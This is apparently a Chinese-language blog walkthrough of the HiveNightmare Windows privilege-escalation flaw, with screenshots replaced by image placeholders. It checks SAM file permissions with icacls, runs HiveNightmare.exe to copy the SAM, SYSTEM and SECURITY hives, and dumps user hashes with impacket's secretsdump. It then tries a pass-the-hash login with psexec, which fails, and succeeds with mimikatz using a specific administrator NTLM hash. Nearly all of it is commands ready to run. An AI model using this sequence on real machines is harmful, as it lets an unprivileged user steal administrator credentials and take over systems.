0x00 前提

执行以下命令

icacls C:\windows\system32\config\sam

如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受攻击,以下两种情况都可以(win10,win2008)
image.png
image.png
如果输出 Access is denied 或拒绝访问表示该系统不易受攻击。(win7失败)
image.png

0x01 使用

下载HiveNightmare.exe

https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe

下载impacket包,使用其中example文件夹下的secretsdump.py文件

https://github.com/SecureAuthCorp/impacket

在需要提权的机器上执行HiveNightmare.exe,获取三个密码文件
image.png
执行以下命令破解密码文件里的密码,获取到所有用户的hash

python secretsdump.py -sam SAM-2021-07-29 -system SYSTEM-2021-07-29 -security SECURITY-2021-07-29 LOCAL

image.png
使用psexec登录,失败了(-_-||),暂时不知道哪出问题

python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4 administrator@192.168.0.8 cmd.exe

image.png
使用mimikatz直接pth成功,使用3b24c391862f4a8531a245a0217708c4这个才是ntlm

mimikatz.exe privilege::debug “sekurlsa::pth /domain:workgroup /user:administrator /ntlm:3b24c391862f4a8531a245a0217708c4 /run:cmd.exe”

image.png

0x02 总结

可以在普通用户的情况下读取到管理员ntlm hash,然后就PTH就好了